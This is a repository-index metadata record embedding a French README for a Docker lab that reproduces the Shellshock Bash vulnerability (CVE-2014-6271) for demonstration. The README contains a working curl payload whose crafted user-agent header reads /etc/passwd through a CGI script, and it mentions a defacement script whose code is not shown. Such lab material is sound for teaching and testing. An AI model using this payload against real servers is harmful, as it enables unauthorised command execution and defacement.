{"id":22242305,"url":"https://github.com/radyio/cve-2014-6271","last_synced_at":"2026-04-29T11:02:07.959Z","repository":{"id":264853778,"uuid":"894384244","full_name":"RadYio/CVE-2014-6271","owner":"RadYio","description":"Projet de présentation d'une CVE (ShellShock) avec pdf, démonstration technique et reproductible","archived":false,"fork":false,"pushed_at":"2024-11-26T12:45:31.000Z","size":2682,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-25T10:32:15.705Z","etag":null,"topics":["bash","cve","docker","shellshock","vulnerability"],"latest_commit_sha":null,"homepage":"https://hub.docker.com/r/radyio/shellshock","language":"Dockerfile","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RadYio.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-11-26T09:07:24.000Z","updated_at":"2024-11-26T12:50:02.000Z","dependencies_parsed_at":null,"dependency_job_id":"cb0247b7-def7-445c-8c56-cd4ff46103ba","html_url":"https://github.com/RadYio/CVE-2014-6271","commit_stats":null,"previous_names":["radyio/cve-2014-6271"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RadYio/CVE-2014-6271","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RadYio%2FCVE-2014-6271","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RadYio%2FCVE-2014-6271/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RadYio%2FCVE-2014-6271/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RadYio%2FCVE-2014-6271/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RadYio","download_url":"https://codeload.github.com/RadYio/CVE-2014-6271/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RadYio%2FCVE-2014-6271/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":32422532,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-29T06:29:02.080Z","status":"ssl_error","status_checked_at":"2026-04-29T06:29:00.631Z","response_time":110,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bash","cve","docker","shellshock","vulnerability"],"created_at":"2024-12-03T04:15:37.476Z","updated_at":"2026-04-29T11:02:07.933Z","avatar_url":"https://github.com/RadYio.png","language":"Dockerfile","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2014-6271\n\n## Description\n\nCe projet permet de reproduire la vulnérabilité **CVE-2014-6271**, également connue sous le nom de **Shellshock**. Shellshock est une vulnérabilité de sécurité dans Bash qui permet d'exécuter du code malveillant via des variables d'environnement.\n\nLe but de ce projet est de démontrer l'impact de cette vulnérabilité sur un environnement Docker.\n\n## Prérequis\n\nAvant de commencer, assurez-vous d'avoir Docker installé sur votre machine. Vous pouvez télécharger Docker [ici](https://www.docker.com/get-started).\n\n## Installation et lancement\n\n### 1. Construire l'image Docker\n\nDans le répertoire du projet, construisez l'image Docker en exécutant la commande suivante :\n\n```bash\ndocker build -t ['image name'] .\n```\n\nRemplacez `['image name']` par le nom que vous souhaitez donner à l'image Docker.\n\n### 2. Lancer le conteneur Docker\n\nUne fois l'image construite, lancez un conteneur à partir de cette image avec la commande suivante :\n\n```bash\ndocker run -it --rm -p 8080:80 ['image name']\n```\n\nCela exposera le service sur le port 8080 de votre machine locale.\n\n### 3. Accéder à l'application\n\nOuvrez votre navigateur et accédez à `http://localhost:8080`. Vous pourrez observer le comportement de l'application et tester la vulnérabilité.\n\n### 4-1. Exploiter la vulnérabilité\n\nDans un autre terminal, exécutez la commande suivante pour exploiter la vulnérabilité et lire le contenu du fichier `/etc/passwd` :\n\n```bash\ncurl -H \"user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'\" \\\nhttp://localhost:8080/cgi-bin/vulnerable\n```\n\nCette commande envoie un en-tête `user-agent` spécialement conçu pour exploiter Shellshock. Si la vulnérabilité est correctement reproduite, le contenu de `/etc/passwd` s'affichera dans la sortie du terminal.\n\n\n### 4-2. Exploiter la vulnérabilité (script exp_deface.sh)\n\nCe script permet d'exploiter la pour défacer une page web cible. La vulnérabilité repose sur une mauvaise configuration de scripts CGI, qui permet l'exécution de commandes arbitraires sur le serveur.\n\nPré-requis :\nAssurez-vous que la cible est vulnérable au bug ShellShock.\nAssurez-vous d'avoir les permissions nécessaires pour tester l'exploit sur cette cible.\n```bash\n./exp_deface.sh \u003cip\u003e \u003cport\u003e\n\n./exp_deface.sh localhost 8080\n```\n\n\n## Sécurité\n\n**Important :** Cette vulnérabilité ne doit être utilisée qu'à des fins de test et de démonstration dans un environnement contrôlé. N'utilisez pas ce projet dans des environnements de production.\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fradyio%2Fcve-2014-6271","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fradyio%2Fcve-2014-6271","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fradyio%2Fcve-2014-6271/lists"}